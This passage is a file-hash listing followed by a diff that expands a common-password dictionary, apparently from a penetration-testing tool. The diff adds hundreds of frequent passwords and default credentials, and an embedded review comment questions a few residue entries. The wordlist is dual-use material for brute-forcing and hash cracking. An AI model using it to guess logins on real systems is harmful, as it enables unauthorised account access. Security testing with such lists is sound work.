+a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py +d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py +f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py +fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py +179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py +4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py +6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py +dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json +5aa308d6173ad9e2a5006a719fdbfe8c20d7e14b6d70c04045b935e44caa96d0 thirdparty/identywaf/identYwaf.py +edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py +d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py 
+879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py +f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py +4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py +2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5 thirdparty/multipart/multipartpost.py +ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py +9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py +691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8 thirdparty/prettyprint/__init__.py +8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f thirdparty/prettyprint/prettyprint.py +3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py +4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e thirdparty/pydes/pyDes.py +c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df thirdparty/six/__init__.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py +7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE +57dba7460c09b7922df68b981e824135f1a6306180ba4c107b626e3232513eff thirdparty/socks/socks.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py +b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py +4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py +7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py 
diff --git a/data/txt/smalldict.txt b/data/txt/smalldict.txt index 55fe63bd61d..20828f97f08 100644 --- a/data/txt/smalldict.txt +++ b/data/txt/smalldict.txt @@ -1,20 +1,27 @@ -!@#$% -!@#$%^ -!@#$%^& -!@#$%^&* +! * ***** ****** ------ +: +????? +?????? +!@#$% +!@#$%^ +!@#$%^& +!@#$%^&* +@#$%^& +$HEX 0 -0.0.0.000 -0.0.000 0000 +0.0.000 00000 +0.0.0.000 000000 0000000 00000000 +0000000000 0000007 000001 000007 @@ -56,12 +63,15 @@ 0racle8i 0racle9 0racle9i +!~!1 1 +100 1000 100000 1001 100100 1002 +100200 1003 1004 1005 @@ -79,6 +89,7 @@ 1017 1018 1020 +10203 102030 1022 1023 @@ -89,23 +100,28 @@ 1028 1029 102938 +1029384756 1030 1031 1066 10sne1 1101 +110110 1102 1103 1104 +111 1111 11111 111111 1111111 11111111 1111111111 +111111a 11112222 1112 111222 +111222tianya 1114 1115 1117 @@ -115,9 +131,11 @@ 112211 112233 11223344 +1122334455 1123 112358 11235813 +1123581321 1124 1125 1129 @@ -164,27 +182,49 @@ 1234321 12344321 12345 +123451 +1234512345 1234554321 123456 +1234560 +1234561 1234567 12345678 123456789 1234567890 +1234567891 12345678910 123456789a 123456789q +12345678a 12345679 +1234567a 123456a +123456aa +123456abc +123456b +123456c +123456d +123456j +123456k +123456l +123456m 123456q +123456s +123456t +123456z 123457 12345a 12345q 12345qwert +12345qwerty +12345t 1234abcd 1234qwer 1235 123654 123654789 +123698745 123789 123987 123aaa @@ -192,7 +232,12 @@ 123asd 123asdf 123go +123hfjdk147 123qwe +123qwe123 +123qweasd +123qweasdzxc +12413 1245 124578 1269 @@ -201,8 +246,10 @@ 1313 131313 13131313 +1314520 1316 1332 +1342 134679 1357 13579 @@ -216,6 +263,7 @@ 142857 1430 143143 +1464688081 147147 147258 14725836 @@ -224,12 +272,14 @@ 147852369 1478963 14789632 +147896325 1492 1515 151515 159159 159357 159753 +159753qq 159951 1616 161616 @@ -317,17 +367,23 @@ 1a2b3c 1a2b3c4d 1chris +1g2w3e4r 1kitty 1p2o3i 1passwor +1password 1q2w3e 1q2w3e4r 1q2w3e4r5t +1q2w3e4r5t6y +1qa2ws3ed 1qaz 1qaz2wsx +1qaz2wsx3edc 1qazxsw2 1qw23e 1qwerty +1v7Upjw3nT 1x2zkg8w 2000 200000 
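Review bot: A few of the added entries look like extraction residue rather than dictionary words. `$HEX` in the first hunk resembles the prefix some tools print in place of non-printable values, and later hunks add `NULL`, `k.` / `k.:` and, between `passwor` and `password`, what appears to be a blank or whitespace-only line (the `-6472,19 +6673,26` counts only add up if that bare `+` is an addition). A whitespace-only entry is also fragile, because an editor that trims trailing whitespace would silently change it and break the project's per-file SHA-256 listing, if that listing covers this file. I would drop `+$HEX`, `+NULL` and the bare `+` line unless they are intentional, in which case the commit message should say so.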
@@ -385,7 +441,9 @@ 272727 2828 282828 +290966 292929 +29rsavoy 2fast4u 2kids 3000gt @@ -430,6 +488,7 @@ 393939 3bears 3ip76k2 +3rJs1la7qE 4040 404040 4055 @@ -440,6 +499,7 @@ 420000 420247 420420 +421uiopy258 4242 424242 426hemi @@ -460,6 +520,7 @@ 456654 4567 456789 +456852 464646 4711 474747 @@ -483,6 +544,8 @@ 515000 51505150 515151 +5201314 +520520 5252 525252 5329 @@ -498,6 +561,7 @@ 555555 5555555 55555555 +5555555555 555666 5656 565656 @@ -518,6 +582,7 @@ 654321 655321 656565 +666 6666 66666 666666 @@ -544,6 +609,7 @@ 7654321 767676 7734 +7758521 777 7777 77777 @@ -586,6 +652,7 @@ 9379992 951753 963852 +963852741 969696 987456 9876 @@ -593,6 +660,7 @@ 987654 98765432 987654321 +9876543210 987987 989898 9999 
@@ -601,200 +669,26 @@ 9999999 99999999 999999999 -????? -?????? -@#$%^& -ABC123 -Abcdef -Abcdefg -Admin -Alexis -Alpha -Andrew -Animals -Anthony -Ariel -Asdfgh -BOSS -Bailey -Bastard -Beavis -Bismillah -Bond007 -Bonzo -Booboo -Boston -Broadway -Canucks -Cardinal -Carol -Casio -Celtics -Champs -ChangeMe -Changeme -Charlie -Chris -Computer -Cougar -Creative -Curtis -Daniel -Darkman -Denise -Dragon -Eagles -Elizabeth -Esther -Family -Figaro -Fisher -Fishing -Fortune -Freddy -Friday -Friends -Front242 -FuckYou -Fuckyou -Gandalf -Geronimo -Gingers -Gizmo -Golden -Goober -Gretel -HARLEY -Hacker -Hammer -Harley -Heather -Hello -Hendrix -Henry -Hershey -Homer -Internet -JSBach -Jackson -Janet -Jeanne -Jennifer -Jersey -Jessica -Joanna -Johnson -Jordan -Joshua -KILLER -Katie -Killer -Kitten -Knight -Liberty -Lindsay -Lizard -Login -Madeline -Margaret -Master -Matthew -Maxwell -Mellon -Merlot -Metallic -Michael -Michel -Michel1 -Michelle -Monday -Money -Monster -Montreal -NCC1701 -Newton -Nicholas -Noriko -OU812 -October -PASSWORD -PPP -Paladin -Pamela -Passw0rd -Password -Password1 -Peaches -Peanuts -Pentium -Pepper -Peter -Phoenix -Piglet -Pookie -Princess -Purple -Qwert -Qwerty -Rabbit -Raiders -Raistlin -Random -Rebecca -Robert -Russell -Sammy -Saturn -Service -Shadow -Sidekick -Sierra -Skeeter -Smokey -Snoopy -Sparky -Speedy -Sterling -Steven -Summer -Sunshine -Superman -Sverige -Swoosh -Taurus -Taylor -Tennis -Theresa -Thomas -Thunder -Tigger -Tuesday -Usuckballz1 -Vernon -Victoria -Vincent -Waterloo -Webster -Willow -Windows -Winnie -Wolverine -Woodrow -World -Zxcvb -Zxcvbnm a a12345 a123456 a1234567 +a12345678 +a123456789 a1b2c3 a1b2c3d4 +a1s2d3f4 +a838hfiD aa +aa123456 +aa12345678 aaa aaa111 aaaa aaaaa +aaaaa1 aaaaaa +aaaaaa1 aaaaaaa aaaaaaaa aaliyah @@ -806,15 +700,22 @@ abbott abby abc abc123 +ABC123 abc1234 abc12345 +abc123456 abcabc abcd abcd123 abcd1234 +Abcd1234 abcde abcdef +Abcdef abcdefg +Abcdefg +abcdefg1 +abcdefg123 abcdefgh aberdeen abgrtyu 
@@ -853,6 +754,7 @@ adi adidas adldemo admin +Admin admin1 admin12 admin123 @@ -884,6 +786,7 @@ ahl ahm aikido aikman +aikotoba aileen airborne airbus @@ -920,10 +823,14 @@ alex1 alexalex alexande alexander +alexander1 alexandr alexandra +alexandre alexia alexis +Alexis +alexis1 alf alfa alfaro @@ -964,6 +871,7 @@ almond aloha alone alpha +Alpha alpha1 alphabet alpine @@ -994,6 +902,7 @@ america america1 american amethyst +amho amigo amigos amorphous @@ -1020,9 +929,11 @@ andre1 andrea andrea1 andreas +andrei andres andrew andrew! +Andrew andrew1 andrey andromache @@ -1033,6 +944,7 @@ andyod22 anfield angel angel1 +angel123 angela angelica angelika @@ -1046,8 +958,10 @@ angie angie1 angus angus1 +anhyeuem animal animals +Animals anime anita ann @@ -1066,6 +980,7 @@ answer antares antelope anthony +Anthony anthony1 anthrax anthropogenic @@ -1077,6 +992,7 @@ antony anubis anvils anything +aobo2010 aolsucks ap apache @@ -1119,6 +1035,7 @@ ariana ariane arianna ariel +Ariel aries arizona arkansas @@ -1142,21 +1059,31 @@ arturo asasas asd asd123 +asd123456 asdasd +asdasd123 +asdasd5 +asdasdasd asddsa asdf asdf12 asdf123 asdf1234 -asdf;lkj +asdf12345 asdfasdf asdfg +asdfg1 asdfgh +Asdfgh +asdfgh1 asdfghj asdfghjk asdfghjkl +asdfghjkl1 asdfjkl asdfjkl; +asdf;lkj +asdqwe123 asdsa asdzxc asf @@ -1252,18 +1179,23 @@ az1943 azazel azerty azertyui +azertyuiop azsxdc aztecs azure azzer +b123456 baba babe babes babies baby +baby12 +baby123 babybaby babyblue babyboy +babyboy1 babycake babydoll babyface @@ -1288,11 +1220,14 @@ badger badgers badgirl badman +badoo baggins baggio bahamut bailey +Bailey bailey1 +baili123com baker balance baldwin @@ -1362,6 +1297,7 @@ basset bassman bassoon bastard +Bastard bastards batch bathing @@ -1398,6 +1334,7 @@ bearcat bearcats beardog bears +bearshare beast beastie beasty @@ -1408,9 +1345,11 @@ beatrice beatriz beautifu beautiful +beautiful1 beauty beaver beavis +Beavis beavis1 bebe because 
@@ -1475,6 +1414,7 @@ beryl bessie best bestbuy +bestfriend beta betacam beth @@ -1486,6 +1426,7 @@ better betty beverly bharat +bhf bian bianca biao @@ -1555,6 +1496,7 @@ billybob billyboy bim bimbo +bimilbeonho bimmer bing bingo @@ -1576,6 +1518,7 @@ bis biscuit bishop bismillah +Bismillah bisounours bitch bitch1 @@ -1619,9 +1562,11 @@ blaze blazer bledsoe blessed +blessed1 blessing blewis blinds +Blink123 blink182 bliss blitz @@ -1701,6 +1646,7 @@ bonanza bonbon bond bond007 +Bond007 bondage bone bonehead @@ -1714,11 +1660,14 @@ bonkers bonner bonnie bonsai +Bonzo boob boobear boobie boobies booboo +Booboo +booboo1 boobs booger boogie @@ -1747,9 +1696,11 @@ boris borussia bosco boss +BOSS boss123 bossman boston +Boston bottle bottom boulder @@ -1822,8 +1773,10 @@ britain british britney brittany +brittany1 brittney broadway +Broadway brodie broken broker @@ -1891,8 +1844,8 @@ buffet buffett buffy buffy1 -bug_reports bugger +bug_reports bugs bugsy builder @@ -1943,6 +1896,7 @@ buttercu buttercup butterfl butterfly +butterfly1 butters buttfuck butthead @@ -1958,6 +1912,7 @@ byebye byron byteme c00per +c123456 caballo cabbage cabernet @@ -1969,7 +1924,6 @@ cactus cad cadillac caesar -cafc91 caitlin calendar calgary @@ -1991,6 +1945,7 @@ camaro camaross camay camber +cambiami camden camel camelot @@ -2031,6 +1986,7 @@ cantona cantor canuck canucks +Canucks canyon capecod capetown @@ -2048,6 +2004,7 @@ carbon card cardiff cardinal +Cardinal cardinals cards carebear @@ -2059,6 +2016,7 @@ carlito carlitos carlo carlos +carlos1 carlton carman carmel @@ -2068,6 +2026,7 @@ carmex2 carnage carnival carol +Carol carol1 carole carolina @@ -2097,6 +2056,7 @@ cash cashmone casino casio +Casio casper casper1 cassandr @@ -2130,8 +2090,6 @@ cavalier caveman cayman cayuga -cbr600 -cbr900rr ccbill cccc ccccc @@ -2139,8 +2097,6 @@ cccccc ccccccc cccccccc cct -cdemo82 -cdemo83 cdemocor cdemorid cdemoucb @@ -2160,6 +2116,7 @@ celica celine celtic celtics +Celtics cement ceng center 
@@ -2183,6 +2140,7 @@ chameleon champ champion champs +Champs chan chance chandler @@ -2190,9 +2148,11 @@ chandra chanel chang change -change_on_install changeit changeme +Changeme +ChangeMe +change_on_install changes channel chantal @@ -2209,6 +2169,7 @@ charles charles1 charley charlie +Charlie charlie1 charlie2 charlott @@ -2293,6 +2254,7 @@ chippy chips chiquita chivas +chivas1 chloe chloe1 chocha @@ -2307,8 +2269,10 @@ choochoo chopin chopper chou +chouchou chouette chris +Chris chris1 chris123 chris6 @@ -2321,6 +2285,7 @@ christa christi christia christian +christian1 christie christin christina @@ -2372,6 +2337,7 @@ citroen city civic civil +cjmasterinf claire clancy clapton @@ -2432,6 +2398,7 @@ cluster clusters clutch clyde +cme2012 cn coach cobain @@ -2453,6 +2420,7 @@ code codename codered codeword +codewort cody coffee cohiba @@ -2485,6 +2453,7 @@ comanche combat comedy comein +comeon11 comet comfort comics @@ -2504,6 +2473,7 @@ compiere complete compton computer +Computer computer1 comrade comrades @@ -2531,6 +2501,9 @@ contact content contest contract +contrasena +contrasenya +contrasinal control controller conway @@ -2580,6 +2553,7 @@ cottage cotton coucou cougar +Cougar cougars counter country @@ -2613,6 +2587,7 @@ creamy create creation creative +Creative creature credit creosote @@ -2627,6 +2602,7 @@ cristina critter cromwell cross +crossfire crow crowley crp @@ -2679,10 +2655,12 @@ cupoi curious current curtis +Curtis cus custom customer cutie +cutie1 cutiepie cutlass cutter @@ -2697,8 +2675,8 @@ cypress cyprus cyrano cz -d_syspw -d_systpw +d123456 +D1lakiss dabears dabomb dada @@ -2742,10 +2720,12 @@ dandan dang danger daniel +Daniel daniel1 daniela daniele danielle +danielle1 daniels danni danny @@ -2762,6 +2742,7 @@ dark1 darkange darklord darkman +Darkman darkness darkside darkstar @@ -2854,12 +2835,16 @@ demo demo8 demo9 demon +demon1q2w3e +demon1q2w3e4r +demon1q2w3e4r5t demons denali deng deniro denis denise +Denise denmark dennis denny 
@@ -2889,7 +2874,6 @@ destiny1 destroy detroit deutsch -dev2000_demos develop device devil @@ -2948,6 +2932,7 @@ dingo dinner dino dinosaur +DIOSESFIEL dip dipper dipshit @@ -3066,11 +3051,13 @@ down downer download downtown +dpbk1234 dpfpass draco dracula draft dragon +Dragon dragon1 dragon12 dragon69 @@ -3105,6 +3092,8 @@ drummer1 drums dsgateway dssys +d_syspw +d_systpw dtsp duan duane @@ -3145,12 +3134,12 @@ dynamite dynamo dynasty e -e-mail eaa eager eagle eagle1 eagles +Eagles eagles1 eam earl @@ -3228,6 +3217,7 @@ elissa elite elizabet elizabeth +Elizabeth elizabeth1 ella ellen @@ -3241,6 +3231,7 @@ elvis1 elvisp elway7 elwood +e-mail email emerald emerson @@ -3250,6 +3241,7 @@ emilio emily emily1 eminem +eminem1 emma emmanuel emmett @@ -3306,6 +3298,7 @@ escape escort escort1 eskimo +esmeramz espresso esquire establish @@ -3313,6 +3306,7 @@ estate estefania estelle esther +Esther estore estrella eternal @@ -3342,6 +3336,8 @@ exchadm exchange excite exfsys +exigent +Exigent exodus exotic experienced @@ -3356,11 +3352,12 @@ extension extra extreme eyal -f**k f00tball fa fabian +facalfare face +facebook facial factory faculty @@ -3378,6 +3375,7 @@ fallen fallon fallout family +Family family1 famous fandango @@ -3456,6 +3454,7 @@ field fields fiesta figaro +Figaro fight fighter fii @@ -3491,6 +3490,7 @@ fish fish1 fishbone fisher +Fisher fishers fishes fishfish @@ -3498,6 +3498,7 @@ fishhead fishie fishin fishing +Fishing fishing1 fishman fishon @@ -3505,6 +3506,8 @@ fisting fitness fitter five +fjalekalim +f**k fktrcfylh flakes flame @@ -3534,6 +3537,7 @@ florida florida1 flounder flower +flower1 flower2 flowerpot flowers @@ -3550,6 +3554,7 @@ flyfish flying fnd fndpub +focalfaire focus foobar food @@ -3583,6 +3588,7 @@ forsythe fortress fortuna fortune +Fortune forum forward fossil @@ -3623,6 +3629,7 @@ freckles fred freddie freddy +Freddy frederic fredfred fredrick 
@@ -3644,10 +3651,13 @@ french french1 fresh friday +Friday friend friendly friends +Friends friends1 +friendster fright frighten frisco @@ -3665,6 +3675,7 @@ froggy frogman frogs front242 +Front242 frontier frost frosty @@ -3675,9 +3686,9 @@ fubar fuck fuck123 fuck69 -fuck_inside fucked fucker +fucker1 fuckers fuckface fuckfuck @@ -3685,9 +3696,11 @@ fuckhead fuckher fuckin fucking +fuck_inside fuckinside fuckit fuckme +fuckme1 fuckme2 fuckoff fuckoff1 @@ -3696,6 +3709,8 @@ fucku fucku2 fuckyou fuckyou! +Fuckyou +FuckYou fuckyou1 fuckyou2 fugazi @@ -3718,6 +3733,7 @@ future fuzz fuzzy fv +fyfcnfcbz fylhtq gabber gabby @@ -3730,6 +3746,7 @@ gadget gaelic gagged gagging +gagtnabar galant galaxy galileo @@ -3746,11 +3763,13 @@ games gamma gammaphi gandalf +Gandalf gandalf1 ganesh gang gangbang gangsta +gangsta1 gangster garage garbage @@ -3803,7 +3822,9 @@ german germany germany1 geronimo +Geronimo gertrude +geslo gesperrt getmoney getout @@ -3839,6 +3860,7 @@ gilligan gina ginger ginger1 +Gingers giorgio giovanni giraffe @@ -3847,6 +3869,7 @@ girls giselle giuseppe gizmo +Gizmo gizmo1 gizmodo gl @@ -3904,6 +3927,7 @@ goku gold goldberg golden +Golden golden1 goldfing goldfish @@ -3912,6 +3936,7 @@ goldstar goldwing golf golfball +golfcourse golfer golfer1 golfgolf @@ -3926,18 +3951,20 @@ gonzalez gonzo gonzo1 goober +Goober good -good-luck goodboy goodbye goodday goodgirl goodie +good-luck goodluck goodman goodtime goofy google +google1 googoo gooner goose @@ -3961,6 +3988,7 @@ gotohell gotribe gouge govols +gozarvazhe gpfd gpld gr @@ -4013,6 +4041,7 @@ gremlin grendel greta gretchen +Gretel gretzky griffey griffin @@ -4025,6 +4054,7 @@ groove groovy groucho group +Groupd2013 groups grover grumpy @@ -4047,6 +4077,7 @@ guitars gumby gumption gundam +gunho gunnar gunner gunners @@ -4055,15 +4086,19 @@ guntis gustav gustavo guyver +gwerty +gwerty123 gymnast gypsy h2opolo hack hacker +Hacker hades haggis haha hahaha +hahaha1 hahahaha hailey hair 
@@ -4077,6 +4112,7 @@ halifax hall hallie hallo +hallo123 halloween hallowell hambone @@ -4086,6 +4122,7 @@ hamilton hamish hamlet hammer +Hammer hammers hammond hampton @@ -4126,6 +4163,8 @@ hardrock hardware harlem harley +Harley +HARLEY harley1 harman harmony @@ -4138,9 +4177,11 @@ harris harrison harry harry1 +harrypotter harvard harvest harvey +haslo hassan hastings hate @@ -4169,6 +4210,7 @@ hearts heat heater heather +Heather heather1 heather2 heaven @@ -4189,11 +4231,13 @@ helene hell hellfire hello +Hello hello1 hello123 hello2 hello8 hellohello +hellokitty helloo hellos hellyeah @@ -4204,8 +4248,10 @@ help123 helper helpme hendrix +Hendrix heng henry +Henry henry1 hentai herbert @@ -4220,13 +4266,17 @@ hermosa heroes herring hershey +Hershey herzog +heslo +hesoyam hetfield hewitt hewlett heyhey heynow heythere +hg0209 hhhh hhhhh hhhhhh @@ -4290,6 +4340,7 @@ homeboy homebrew homemade homer +Homer homer1 homerj homers @@ -4353,6 +4404,7 @@ hotstuff hott hottest hottie +hottie1 hotties houdini hounddog @@ -4370,6 +4422,7 @@ huai huang hubert hudson +hudyat huey huge hugh @@ -4430,6 +4483,7 @@ if6was9 iforget iforgot ifssys +igamalokungena igc igf igi @@ -4450,13 +4504,17 @@ illinois illusion ilmari ilovegod +iloveme +iloveme1 ilovesex iloveu iloveu1 +iloveu2 iloveyou iloveyou! iloveyou. iloveyou1 +iloveyou12 iloveyou2 iloveyou3 image @@ -4476,11 +4534,13 @@ imt include incubus india +india123 indian indiana indians indigo indonesia +Indya123 infantry inferno infiniti @@ -4512,15 +4572,18 @@ intercourse intern internal internet +Internet intranet intrepid intruder +inuyasha inv invalid invalid password iomega ipa ipd +iphasiwedi iplanet ipswich ireland @@ -4553,10 +4616,10 @@ itg itsme ivan iverson -iverson3 iwantu izzy j0ker +j123456 j1l2t3 ja jabber @@ -4571,6 +4634,7 @@ jackjack jackoff jackpot jackson +Jackson jackson1 jackson5 jacob @@ -4587,6 +4651,7 @@ jakarta jake jakejake jakey +jakjak jamaica james james007 
@@ -4605,6 +4670,7 @@ jan jane janelle janet +Janet janice janie janine @@ -4623,6 +4689,7 @@ jasper java javelin javier +javka jaybird jayden jayhawk @@ -4636,6 +4703,7 @@ je jean jeanette jeanne +Jeanne jeannie jedi jeep @@ -4649,6 +4717,7 @@ jeffrey1 jello jelly jellybea +jelszo jen jenifer jenjen @@ -4659,6 +4728,8 @@ jennaj jenni jennie jennifer +Jennifer +jennifer1 jenny jenny1 jensen @@ -4675,10 +4746,12 @@ jerome jerry jerry1 jersey +Jersey jess jesse jesse1 jessica +Jessica jessica1 jessie jester @@ -4728,6 +4801,7 @@ jl jmuser joanie joanna +Joanna joanne jocelyn jockey @@ -4757,6 +4831,7 @@ johnjohn johnny johnny5 johnson +Johnson johnson1 jojo jojojo @@ -4766,12 +4841,14 @@ jokers jomama jonas jonathan +jonathan1 jonathon jones jones1 jonjon jonny jordan +Jordan jordan1 jordan23 jordie @@ -4784,6 +4861,7 @@ joseph1 josephin josh joshua +Joshua joshua1 josie journey @@ -4791,6 +4869,7 @@ joy joyce joyjoy jsbach +JSBach jtf jtm jts @@ -4839,11 +4918,16 @@ justice justice4 justin justin1 +justinbieb +justinbieber justine justme justus juventus +k. +k.: kaboom +kadavucol kahlua kahuna kaiser @@ -4851,7 +4935,11 @@ kaitlyn kakaxaqwe kakka kalamazo +kalameobur kali +kalimatumurur +kalimatusirr +kalmarsirri kamikaze kane kang @@ -4869,8 +4957,10 @@ karma kashmir kasper kat +katalaluan katana katarina +katasandi kate katerina katherin @@ -4880,6 +4970,7 @@ kathrine kathryn kathy katie +Katie katie1 katina katrin @@ -4912,6 +5003,7 @@ keng kenken kennedy kenneth +kennwort kenny kenobi kenshin @@ -4950,7 +5042,10 @@ kill killa killbill killer +Killer +KILLER killer1 +killer123 killers killjoy killkill @@ -4988,6 +5083,7 @@ kitchen kiteboy kitkat kitten +Kitten kittens kittie kitty @@ -5008,12 +5104,16 @@ klondike knickers knicks knight +Knight knights knock knockers knuckles koala +kobe24 +kodeord kodiak +kodikos kojak koko kokoko @@ -5025,6 +5125,7 @@ kool koolaid korn kotaku +kouling kramer kris krishna 
@@ -5046,6 +5147,11 @@ kuai kuang kume kungfu +kupiasoz +kupuhipa +kupukaranga +kupuuru +kupuwhakahipa kurt kwalker kyle @@ -5065,6 +5171,7 @@ lagnaf laguna lakers lakers1 +lakers24 lakeside lakewood lakota @@ -5099,6 +5206,7 @@ laserjet laskjdf098ksdaf09 lassie lassie1 +lastfm lasvegas latin latina @@ -5108,6 +5216,7 @@ laura laura1 laurel lauren +lauren1 laurence laurent laurie @@ -5125,6 +5234,7 @@ leanne leather lebesgue leblanc +lebron23 ledzep lee leeds @@ -5179,6 +5289,7 @@ liang liao libertad liberty +Liberty libra library lick @@ -5204,16 +5315,20 @@ lilly lima limewire limited +lincogo1 lincoln linda linda1 linden lindros lindsay +Lindsay lindsey ling link +linkedin linkin +linkinpark links lion lionel @@ -5237,6 +5352,8 @@ liverpool1 living liz lizard +Lizard +lizottes lizzie lizzy lkjhgf @@ -5260,11 +5377,13 @@ logan1 logger logical login +Login logitech logos lois loislane loki +lol lol123 lola lolipop @@ -5305,6 +5424,8 @@ lorin lorna lorraine lorrie +losen +losenord loser loser1 losers @@ -5319,20 +5440,27 @@ louise loulou love love1 +love11 love12 love123 +love1234 +love13 +love4ever love69 lovebug loveit lovelife lovelove lovely +lovely1 loveme loveme1 +loveme2 lover lover1 loverboy lovers +lovers1 lovesex loveya loveyou @@ -5340,6 +5468,7 @@ loveyou1 loving lowell lowrider +lozinka luan lucas lucas1 @@ -5365,9 +5494,11 @@ luna lunchbox lust luther +lykilord lynn lynne m +m123456 m1911a1 mac macaroni @@ -5391,6 +5522,7 @@ madden maddie maddog madeline +Madeline madison madison1 madmad @@ -5401,6 +5533,7 @@ madoka madonna madrid maestro +maganda magazine magelan magellan @@ -5421,6 +5554,8 @@ magnum magnus magpie magpies +mahalkita +mahalko mahler maiden mail @@ -5446,6 +5581,7 @@ mallrats malone mama mamacita +mamapapa mamas mammoth manag3r @@ -5481,6 +5617,7 @@ manuel manuela manutd maple +mar mara maradona marathon @@ -5497,6 +5634,7 @@ marcos marcus marcy margaret +Margaret margarita margie maria 
@@ -5545,6 +5683,7 @@ marquis marriage married mars +marseille marsha marshal marshall @@ -5572,6 +5711,7 @@ massage massimo massive master +Master master1 master12 masterbate @@ -5583,11 +5723,13 @@ matchbox math mathew matilda +matkhau matrix matrix1 matt matteo matthew +Matthew matthew1 matthews matthias @@ -5612,6 +5754,7 @@ maximus maxine maxmax maxwell +Maxwell maxwell1 maxx maxxxx @@ -5651,6 +5794,7 @@ megaman megan megan1 megane +megaparol12345 megapass megatron meggie @@ -5662,6 +5806,7 @@ melinda melissa melissa1 mellon +Mellon mellow melody melrose @@ -5689,6 +5834,7 @@ meridian merlin merlin1 merlot +Merlot mermaid merrill messenger @@ -5696,11 +5842,14 @@ messiah met2002 metal metallic +Metallic metallica +metallica1 method mets mexican mexico +mexico1 mfg mgr mgwuser @@ -5709,6 +5858,7 @@ miamor mian miao michael +Michael michael1 michael2 michaela @@ -5716,8 +5866,12 @@ michaels michal micheal michel +Michel +Michel1 michele michelle +Michelle +michelle1 michigan michou mick @@ -5731,6 +5885,7 @@ microsoft middle midget midnight +midnight1 midnite midori midvale @@ -5762,6 +5917,7 @@ millions millwall milo milton +mima mimi mindy mine @@ -5836,6 +5992,7 @@ mollydog molson mom mommy +mommy1 momo momomo momoney @@ -5843,10 +6000,12 @@ monaco monalisa monarch monday +Monday mondeo mone monet money +Money money1 money123 money159 @@ -5868,6 +6027,7 @@ monkeys monopoly monroe monster +Monster monster1 monsters montag @@ -5876,6 +6036,7 @@ montana3 monte montecar montreal +Montreal montrose monty monty1 @@ -5918,7 +6079,10 @@ mortimer morton moscow moses +mot de passe mot_de_passe +motdepasse +mot dordre mother mother1 motherfucker @@ -5984,15 +6148,21 @@ mygirl mykids mylife mylove +mynoob mypass mypassword mypc123 myriam myrtle myself +myspace myspace1 +myspace123 +myspace2 mystery mystic +n +N0=Acc3ss nadia nadine nagel @@ -6012,11 +6182,13 @@ napoli napster narnia naruto +naruto1 nasa nascar nascar24 nasty nasty1 +nastya nat natalia nataliag 
@@ -6040,6 +6212,7 @@ navy navyseal nazgul ncc1701 +NCC1701 ncc1701a ncc1701d ncc1701e @@ -6056,6 +6229,7 @@ nellie nelson nemesis neng +nenosiri neon neotix_sys nepenthe @@ -6088,6 +6262,7 @@ newpass6 newport news newton +Newton newuser newyork newyork1 @@ -6103,6 +6278,8 @@ nice niceass niceguy nicholas +Nicholas +nicholas1 nichole nick nickel @@ -6168,6 +6345,7 @@ none none1 nonenone nong +nonmember nonono noodle noodles @@ -6176,6 +6354,7 @@ nopass nopassword norbert noreen +Noriko normal norman normandy @@ -6207,6 +6386,7 @@ nudist nuevopc nugget nuggets +NULL number number1 number9 @@ -6224,10 +6404,11 @@ nylons nymets nympho nyquist +nywila oakland oakley -oas_public oasis +oas_public oatmeal oaxaca obelix @@ -6243,17 +6424,18 @@ ocelot ocitest ocm_db_admin october +October octopus odessa odm ods -ods_server odscommon +ods_server odyssey oe -oem_temp oemadm oemrep +oem_temp office officer offshore @@ -6271,6 +6453,7 @@ okokok okr oks oksana +okwuntughe okx olapdba olapsvr @@ -6347,6 